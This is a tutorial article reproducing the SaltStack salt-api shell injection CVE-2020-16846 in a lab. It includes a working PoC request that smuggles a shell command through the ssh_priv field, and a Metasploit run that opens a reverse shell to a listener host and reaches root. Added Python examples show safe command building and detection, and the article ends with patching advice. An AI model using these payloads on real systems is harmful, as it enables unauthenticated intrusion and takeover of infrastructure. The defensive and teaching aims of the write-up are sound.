
How to understand the SaltStack shell injection vulnerability CVE-2020-16846

2025-01-17 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article explains in detail how to understand the SaltStack shell injection vulnerability CVE-2020-16846. The content is of high quality, so the editor shares it here as a reference; I hope you will have some understanding of the relevant knowledge after reading it.

Reproduction of the SaltStack shell injection vulnerability (CVE-2020-16846)

I. Brief introduction of the vulnerability

SaltStack is a distributed operations (OPS) system that is widely used in Internet-facing environments. It has two main functions:

A configuration management system that can keep remote nodes in a predefined state

A distributed remote execution system that executes commands and queries data on remote nodes, either individually or by arbitrary selection criteria

Combining CVE-2020-16846 with CVE-2020-25592 allows arbitrary command execution through the salt-api interface without authentication: CVE-2020-25592 lets any user call the SSH client (module), and CVE-2020-16846 lets that user execute arbitrary shell commands through it. Although salt-api is not enabled by default, the vast majority of SaltStack users do enable it, so the risk is high.
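The underlying defect is ordinary shell injection: a request parameter (in the PoC below, ssh_priv) ends up inside a command string that is handed to a shell, so its metacharacters are interpreted. The following Python example is added here and is not code from the original article or from the Salt project; the helper names (build_ssh_cmd_vulnerable, build_ssh_cmd_quoted, build_ssh_cmd_safe, shell_commands) and the command-line shape are simplified assumptions. It uses shlex to tokenize each command string exactly as a POSIX shell would, so it shows, without executing anything, why the interpolated string runs a second command while the argv form and the shlex.quote form keep the same input as one literal argument.

```python
import shlex
from typing import List

# Constructed sample input modelled on the ssh_priv parameter in the PoC:
# a value that smuggles a pipe and a second command into the SSH command line.
INJECTED_PRIV = "aaa | touch /tmp/success;"
SHELL_CONTROL_OPERATORS = {"|", ";", "&", "&&", "||"}


def build_ssh_cmd_vulnerable(host: str, ssh_priv: str) -> str:
    """Vulnerable pattern (simplified, hypothetical; not Salt's code): the
    request parameter is interpolated into one string that a caller would
    hand to subprocess with shell=True, so the shell re-parses it."""
    return f"ssh -i {ssh_priv} -o StrictHostKeyChecking=no {host} id"


def build_ssh_cmd_quoted(host: str, ssh_priv: str) -> str:
    """Mitigation when a shell string is unavoidable: shlex.quote() turns the
    value into a single shell word, so its metacharacters are inert."""
    return f"ssh -i {shlex.quote(ssh_priv)} -o StrictHostKeyChecking=no {shlex.quote(host)} id"


def build_ssh_cmd_safe(host: str, ssh_priv: str) -> List[str]:
    """Preferred fix: an argv list run with shell=False (subprocess.run(argv)).
    Each element reaches ssh as exactly one argument; no shell ever parses it."""
    return ["ssh", "-i", ssh_priv, "-o", "StrictHostKeyChecking=no", host, "id"]


def shell_commands(cmd_string: str) -> List[List[str]]:
    """Tokenize a command string the way a POSIX shell would and split it into
    the separate commands the shell would run. punctuation_chars=True makes
    shlex emit operators such as '|' and ';' as their own tokens (Python 3.8+)."""
    lexer = shlex.shlex(cmd_string, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands: List[List[str]] = []
    current: List[str] = []
    for tok in lexer:
        if tok in SHELL_CONTROL_OPERATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def is_injected(cmd_string: str) -> bool:
    """True when the string would make the shell run more than one command."""
    return len(shell_commands(cmd_string)) > 1


if __name__ == "__main__":
    host = "192.0.2.10"  # RFC 5737 documentation address, constructed
    for label, cmd in (("vulnerable", build_ssh_cmd_vulnerable(host, INJECTED_PRIV)),
                       ("quoted", build_ssh_cmd_quoted(host, INJECTED_PRIV))):
        print(f"{label:10s} -> {shell_commands(cmd)}")
    print(f"{'argv':10s} -> {build_ssh_cmd_safe(host, INJECTED_PRIV)}")
```

Run stand-alone it prints the three forms: the vulnerable string splits into three commands (the second one being touch /tmp/success), while both the quoted string and the argv list carry the whole payload as the single argument after -i. The argv form is the one to prefer in a fix, because it removes the shell from the path entirely rather than relying on every call site remembering to quote.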

II. Environment setup

Download environment:

Https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846

Or reply "CVE-2020-16846" to the public account backend to download the environment.

Environment startup: docker-compose up -d

Access address: https://192.168.1.107:8000/

III. Vulnerability reproduction

PoC:

POST /run HTTP/1.1
Host: 192.168.1.107:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/x-yaml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa | touch%20/tmp/success%3b

Executing the PoC

The touch succeeded: the file /tmp/success was created
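From the defender's side, the request above has a recognisable shape: a POST to /run that selects client=ssh and carries shell metacharacters in one of the salt-ssh parameters. The following Python example is added here and is not from the original article or from the Salt project; it inspects a small set of constructed request records (the first one reproduces the PoC body, the rest are benign) and classifies them. The list of salt-ssh parameter names it checks (ssh_priv, roster, ssh_user, ssh_passwd, ssh_port, ssh_options) and the inspect_request/scan helper names are assumptions for the example, and obtaining request bodies (for instance from a reverse proxy in front of salt-api) is left to the deployment.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs

# Constructed sample requests (method, path, form body) modelled on the PoC above.
# Not captured traffic: #0 reproduces the PoC body, #1 to #3 are benign.
SAMPLE_REQUESTS: List[Tuple[str, str, str]] = [
    ("POST", "/run",
     "token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa | touch%20/tmp/success%3b"),
    ("POST", "/run", "username=salt&password=hunter2&eauth=pam&client=local&tgt=*&fun=test.ping"),
    ("POST", "/login", "username=salt&password=hunter2&eauth=pam"),
    ("POST", "/run", "client=ssh&tgt=web*&fun=state.apply&roster=flat"),
]

# Shell metacharacters that have no business inside an SSH key path or roster name.
SHELL_META = re.compile(r"[|;&`<>\n]|\$\(")
# salt-ssh parameters that end up on the ssh command line (assumed list for the example).
SSH_PARAMS = ("ssh_priv", "roster", "ssh_user", "ssh_passwd", "ssh_port", "ssh_options")


def inspect_request(method: str, path: str, body: str) -> Dict[str, object]:
    """Classify one salt-api request.
    'high'   = client=ssh with shell metacharacters in an ssh parameter
               (the CVE-2020-16846 pattern);
    'medium' = any /run call using the ssh client, which CVE-2020-25592
               lets through without eauth;
    'none'   = everything else."""
    reasons: List[str] = []
    severity = "none"
    if method != "POST" or path.rstrip("/") != "/run":
        return {"severity": severity, "reasons": reasons}
    # parse_qs decodes %20 / %3b, so the ssh_priv value is seen as the shell would see it.
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("client") == "ssh":
        severity = "medium"
        reasons.append("ssh client invoked via /run (CVE-2020-25592 auth bypass path)")
        for name in SSH_PARAMS:
            value = params.get(name, "")
            if SHELL_META.search(value):
                severity = "high"
                reasons.append(f"shell metacharacters in {name}={value!r} (CVE-2020-16846 pattern)")
    return {"severity": severity, "reasons": reasons}


def scan(requests: List[Tuple[str, str, str]]) -> List[Tuple[int, str]]:
    """Return (index, severity) for every request that is not benign."""
    hits: List[Tuple[int, str]] = []
    for i, (method, path, body) in enumerate(requests):
        verdict = inspect_request(method, path, body)
        if verdict["severity"] != "none":
            hits.append((i, str(verdict["severity"])))
    return hits


if __name__ == "__main__":
    for i, (method, path, body) in enumerate(SAMPLE_REQUESTS):
        verdict = inspect_request(method, path, body)
        print(f"#{i} {method} {path}: {verdict['severity']}")
        for reason in verdict["reasons"]:
            print("   -", reason)
```

The medium tier is deliberate: on an unpatched master any client=ssh call through /run is reachable without credentials, so it is worth an alert even when the parameters look clean, and a patched master that never uses salt-ssh through the API should see none of them.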

Metasploit (msf) also has an exploit module for this vulnerability:

Exploit/linux/http/saltstack_salt_api_cmd_exec

msf6 > use exploit/linux/http/saltstack_salt_api_cmd_exec
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set rhosts 192.168.1.107
rhosts => 192.168.1.107
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set rport 8000
rport => 8000
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set LhOST 192.168.1.117
LhOST => 192.168.1.117
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > set LPORT 4444
LPORT => 4444
msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > show options

Module options (exploit/linux/http/saltstack_salt_api_cmd_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.107    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      8000             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_python_ssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.117    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix Command

msf6 exploit(linux/http/saltstack_salt_api_cmd_exec) > exploit

[*] Started reverse SSL handler on 192.168.1.117:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Auth bypass successful.
[*] Executing Unix Command for cmd/unix/reverse_python_ssl
[*] Command shell session 2 opened (192.168.1.117:4444 -> 192.168.1.107:50332) at 2020-12-21 22:34:40 +0800

id
uid=0(root) gid=0(root) groups=0(root)

IV. Fix recommendations

1. Fix it as soon as possible. Since the official upgrade package has not been released yet, the fix still has to be applied manually; refer to the official security notice and fix.

2. If you do not need salt-api, disable it.

That concludes this explanation of how to understand the SaltStack shell injection vulnerability CVE-2020-16846. I hope the above content is of some help to you and lets you learn more. If you think the article is good, share it so more people can see it.
